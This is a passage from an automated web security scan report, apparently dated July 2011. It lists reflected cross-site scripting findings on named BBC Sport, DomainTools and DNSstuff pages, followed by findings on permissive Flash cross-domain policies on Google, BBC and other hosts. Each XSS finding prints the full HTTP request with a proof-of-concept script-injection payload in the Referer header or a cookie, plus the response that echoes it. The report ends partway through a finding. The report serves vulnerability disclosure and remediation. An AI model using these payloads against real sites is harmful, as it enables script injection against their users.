Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a432b'-alert(1)-'9bd28bad69c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:44 GMT
Keep-Alive: timeout=5, max=711
Expires: Mon, 18 Jul 2011 02:20:44 GMT
Connection: close
Content-Length: 55850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955644000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a432b'-alert(1)-'9bd28bad69c',
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/sport2/hi/golf/141782
...[SNIP]...

3.195. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d7e'-alert(1)-'ec64a95f7e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4d7e'-alert(1)-'ec64a95f7e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:45 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:45 GMT
Connection: close
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955645000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d4d7e'-alert(1)-'ec64a95f7e7',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.196. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f455'-alert(1)-'f2321d0a6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f455'-alert(1)-'f2321d0a6c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:55 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:55 GMT
Connection: close
Content-Length: 49358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955655000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4f455'-alert(1)-'f2321d0a6c',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.197. http://www.domaintools.com/learn/help/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5edd4"><script>alert(1)</script>8cde835349e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /learn/help/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5edd4"><script>alert(1)</script>8cde835349e

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:02 GMT
Content-Length: 13206
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools Help</title>
    <link rel="alternate" type="application/rss+xml" ti
...[SNIP]...
<a id="return-to-entry-point" href="http://www.google.com/search?hl=en&q=5edd4"><script>alert(1)</script>8cde835349e">
...[SNIP]...

3.198. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload bef9e<script>alert(1)</script>cd0826810c8 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 37861

this.STVisitorValue = "3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPortalURL = "";
this.STImgHeigh
...[SNIP]...

4. Flash cross-domain policy
There are 19 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 01:43:19 GMT
Date: Mon, 18 Jul 2011 01:43:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 1955

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.2. http://feed.domaintoolsblog.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.domaintoolsblog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.domaintoolsblog.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:16:15 GMT
Date: Mon, 18 Jul 2011 02:16:15 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.3. http://m.webtrends.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:789"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 12:52:05 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.4. https://adwords.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 22:32:55 GMT
Expires: Mon, 18 Jul 2011 22:32:55 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 13375
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.5. http://cbk0.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cbk0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cbk0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Date: Mon, 18 Jul 2011 02:16:07 GMT
Expires: Mon, 18 Jul 2011 02:16:07 GMT
Cache-Control: private, max-age=3600
Last-Modified: Fri, 17 Dec 2004 04:58:08 GMT
X-Content-Type-Options: nosniff
Server: Alleycat Server 1.0
X-XSS-Protection: 1; mode=block

<cross-domain-policy><allow-access-from domain="maps.gstatic.com"/><allow-access-from domain="maps.gstatic.cn"/><allow-access-from domain="*.google.com"/><allow-access-from domain="*.google.at"/><allow-access-from domain="*.google.com.au"/><allow-access-from domain="*.google.be"/><allow-access-from domain="*.google.com.br"/><allow-access-from domain="*.google.ca"/><allow-access-from domain="*.google.cat"/><allow-access-from domain="*.google.ch"/><allow-access-from domain="*.google.cn"/><allow-access-from domain="*.google.cz"/><allow-access-from domain="*.google.de"/><allow-access-from domain="*.google.dk"/><allow-access-from domain="*.google.es"/><allow-access-from domain="*.google.fi"/><allow-access-from domain="*.google.fr"/><allow-access-from domain="*.google.gr"/><allow-access-from domain="*.google.com.hk"/><allow-access-from domain="*.google.hu"/><allow-access-from domain="*.google.ie"/><allow-access-from domain="*.google.co.il"/><allow-access-from domain="*.google.co.in"/><allow-access-from domain="*.google.it"/><allow-access-from domain="*.google.co.jp"/><allow-access-from domain="*.google.co.ke"/><allow-access-from domain="*.google.co.kr"/><allow-access-from domain="*.google.li"/><allow-access-from domain="*.google.nl"/><allow-access-from domain="*.google.no"/><allow-access-from domain="*.google.co.nz"/><allow-access-from domain="*.google.pl"/><allow-access-from domain="*.google.pt"/><allow-access-from domain="*.google.ro"/><allow-access-from domain="*.google.ru"/><allow-access-from domain="*.google.se"/><allow-access-from domain="*.google.com.sg"/><allow-access-from domain="*.google.sk"/><allow-access-from domain="*.google.tk"/><allow-access-from domain="*.google.com.tw"/><allow-access-from domain="*.google.co.uk"/><allow-access-from domain="*.google.co.za"/>
...[SNIP]...

4.6. https://cbks0.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cbks0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cbks0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Date: Mon, 18 Jul 2011 02:16:08 GMT
Expires: Mon, 18 Jul 2011 02:16:08 GMT
Cache-Control: private, max-age=3600
Last-Modified: Fri, 17 Dec 2004 04:58:08 GMT
X-Content-Type-Options: nosniff
Server: Alleycat Server 1.0
X-XSS-Protection: 1; mode=block

<cross-domain-policy><allow-access-from domain="maps.gstatic.com"/><allow-access-from domain="maps.gstatic.cn"/><allow-access-from domain="*.google.com"/><allow-access-from domain="*.google.at"/><allow-access-from domain="*.google.com.au"/><allow-access-from domain="*.google.be"/><allow-access-from domain="*.google.com.br"/><allow-access-from domain="*.google.ca"/><allow-access-from domain="*.google.cat"/><allow-access-from domain="*.google.ch"/><allow-access-from domain="*.google.cn"/><allow-access-from domain="*.google.cz"/><allow-access-from domain="*.google.de"/><allow-access-from domain="*.google.dk"/><allow-access-from domain="*.google.es"/><allow-access-from domain="*.google.fi"/><allow-access-from domain="*.google.fr"/><allow-access-from domain="*.google.gr"/><allow-access-from domain="*.google.com.hk"/><allow-access-from domain="*.google.hu"/><allow-access-from domain="*.google.ie"/><allow-access-from domain="*.google.co.il"/><allow-access-from domain="*.google.co.in"/><allow-access-from domain="*.google.it"/><allow-access-from domain="*.google.co.jp"/><allow-access-from domain="*.google.co.ke"/><allow-access-from domain="*.google.co.kr"/><allow-access-from domain="*.google.li"/><allow-access-from domain="*.google.nl"/><allow-access-from domain="*.google.no"/><allow-access-from domain="*.google.co.nz"/><allow-access-from domain="*.google.pl"/><allow-access-from domain="*.google.pt"/><allow-access-from domain="*.google.ro"/><allow-access-from domain="*.google.ru"/><allow-access-from domain="*.google.se"/><allow-access-from domain="*.google.com.sg"/><allow-access-from domain="*.google.sk"/><allow-access-from domain="*.google.tk"/><allow-access-from domain="*.google.com.tw"/><allow-access-from domain="*.google.co.uk"/><allow-access-from domain="*.google.co.za"/>
...[SNIP]...

4.7. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 18 Jul 2011 01:52:37 GMT
Date: Mon, 18 Jul 2011 01:50:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.8. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 23:05:40 GMT
Expires: Mon, 18 Jul 2011 23:05:40 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 10401
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.9. http://news.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=10
Content-Type: text/xml
Date: Mon, 18 Jul 2011 02:19:14 GMT
Keep-Alive: timeout=5, max=792
Expires: Mon, 18 Jul 2011 02:19:24 GMT
Connection: close
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Length: 1081

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.10. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

